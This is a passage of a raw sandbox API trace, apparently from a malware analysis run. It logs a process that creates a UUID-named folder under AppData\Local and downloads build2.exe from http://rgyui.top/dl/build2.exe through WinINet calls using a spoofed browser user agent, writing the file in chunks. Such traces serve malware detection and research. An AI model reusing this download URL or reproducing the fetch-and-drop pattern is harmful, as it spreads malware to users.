lpMem=0x2bf2a50 | out: hHeap=0x2a0000) returned 1 [0121.325] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf32d8 | out: hHeap=0x2a0000) returned 1 [0121.325] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf3b60 | out: hHeap=0x2a0000) returned 1 [0121.325] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf43e8 | out: hHeap=0x2a0000) returned 1 [0121.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b86438 | out: hHeap=0x2a0000) returned 1 [0121.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb6110 | out: hHeap=0x2a0000) returned 1 [0121.326] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b285b8 | out: hHeap=0x2a0000) returned 1 [0121.327] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75008 | out: hHeap=0x2a0000) returned 1 [0121.327] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bd14e8 | out: hHeap=0x2a0000) returned 1 [0121.327] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcd9e0 | out: hHeap=0x2a0000) returned 1 [0121.328] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b85b40 | out: hHeap=0x2a0000) returned 1 [0121.328] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c1a78 | out: hHeap=0x2a0000) returned 1 [0121.332] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c0718 | out: hHeap=0x2a0000) returned 1 [0121.332] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0121.332] ExitProcess (uExitCode=0x0) [0121.333] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2afd488 | out: hHeap=0x2a0000) returned 1 [0121.333] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bf228 | out: hHeap=0x2a0000) returned 1 Thread: id = 64 os_tid = 0xeec Thread: id = 65 os_tid = 0xef0 Thread: id = 66 os_tid = 0xef4 Thread: id = 67 os_tid = 0xef8 Thread: id = 68 os_tid = 0xefc Thread: id = 69 os_tid = 0xf00 Thread: id = 70 os_tid = 0xf04 [0104.833] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ed68 [0104.839] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2b2ed10 [0104.844] GetLastError () returned 0x54f [0104.907] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3bc) returned 0x2b723a8 [0104.934] GetCurrentThreadId () returned 0xf04 [0104.934] SetLastError (dwErrCode=0x54f) [0104.960] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4db08 [0104.960] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b15940 [0104.968] GetLastError () returned 0x54f [0104.968] SetLastError (dwErrCode=0x54f) [0104.968] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dad0 [0104.968] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4da28 [0104.968] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15940 | out: hHeap=0x2a0000) returned 1 [0104.968] GetLastError () returned 0x54f [0104.968] SetLastError (dwErrCode=0x54f) [0104.969] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b2ed10 | out: hHeap=0x2a0000) returned 1 [0104.969] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0105.636] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathA") returned 0x75cf7804 [0105.636] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x400) returned 0x2b77618 [0105.636] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2b77618 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0105.637] UuidCreate (in: Uuid=0x91ad768 | out: Uuid=0x91ad768) returned 0x0 [0105.723] UuidToStringA (in: Uuid=0x91ad768, StringUuid=0x91ad6c0 | out: StringUuid=0x91ad6c0) returned 0x0 [0105.723] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4db40 [0105.723] RpcStringFreeA (in: String=0x91ad6c0 | out: String=0x91ad6c0) returned 0x0 [0105.723] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19") returned 1 [0105.724] CreateDirectoryA (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19"), lpSecurityAttributes=0x0) returned 1 [0105.734] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x410) returned 0x2b77a20 [0105.734] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x410) returned 0x2b747b8 [0105.743] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1000) returned 0x2b74bd0 [0105.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b747b8, cbMultiByte=-1, lpWideCharStr=0x2b74bd0, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19") returned 70 [0105.743] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1010) returned 0x2b85b40 [0105.743] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b74bd0 | out: hHeap=0x2a0000) returned 1 [0105.744] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b747b8 | out: hHeap=0x2a0000) returned 1 [0105.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b15940 [0105.744] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0105.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4db78 [0105.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x844) returned 0x2b747b8 [0105.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b4db78, cbMultiByte=-1, lpWideCharStr=0x2b747b8, cchWideChar=1058 | out: lpWideCharStr="http://rgyui.top/dl/build2.exe") returned 31 [0105.744] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2b75008 [0105.745] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b747b8 | out: hHeap=0x2a0000) returned 1 [0105.745] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4db78 | out: hHeap=0x2a0000) returned 1 [0105.754] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2b75860 [0105.754] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x822) returned 0x2b747b8 [0105.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://rgyui.top/dl/build2.exe", cchWideChar=-1, lpMultiByteStr=0x2b747b8, cbMultiByte=2082, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://rgyui.top/dl/build2.exe", lpUsedDefaultChar=0x0) returned 31 [0105.754] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2b86b58 [0105.754] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b747b8 | out: hHeap=0x2a0000) returned 1 [0105.755] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75860 | out: hHeap=0x2a0000) returned 1 [0105.755] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://rgyui.top/dl/build2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0106.822] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b86b58 | out: hHeap=0x2a0000) returned 1 [0106.822] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x91ad6d0, lpdwBufferLength=0x91ad710, lpdwIndex=0x0 | out: lpBuffer=0x91ad6d0*, lpdwBufferLength=0x91ad710*=0x4, lpdwIndex=0x0) returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d8a0 [0106.823] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d8a0 | out: hHeap=0x2a0000) returned 1 [0106.823] lstrcpyA (in: lpString1=0x2b77618, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19" [0106.823] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19", pMore="build2.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe") returned 1 [0106.823] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b28688 [0106.823] CreateFileA (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0106.824] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.826] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.836] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.839] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.916] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.918] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.923] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.926] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.927] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0106.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0106.999] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.002] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.008] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.009] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.009] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.010] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.010] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.010] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.013] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.014] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.018] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.019] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.057] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.075] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.079] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.080] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.086] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.094] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.100] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.129] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.130] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.208] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.209] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.211] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.212] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.212] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.212] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.213] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.213] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.214] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.214] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.215] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.217] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.217] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.218] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.218] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.219] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.219] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.282] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.305] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.307] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.308] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x91ad6d8 | out: lpBuffer=0x91ad778*, lpdwNumberOfBytesRead=0x91ad6d8*=0x2800) returned 1 [0107.309] WriteFile (in: hFile=0x544, lpBuffer=0x91ad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x91ad6dc, lpOverlapped=0x0 | out: lpBuffer=0x91ad778*, lpNumberOfBytesWritten=0x91ad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.309] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x91ad778, dwNumberOfBytesToRead=0x2800, 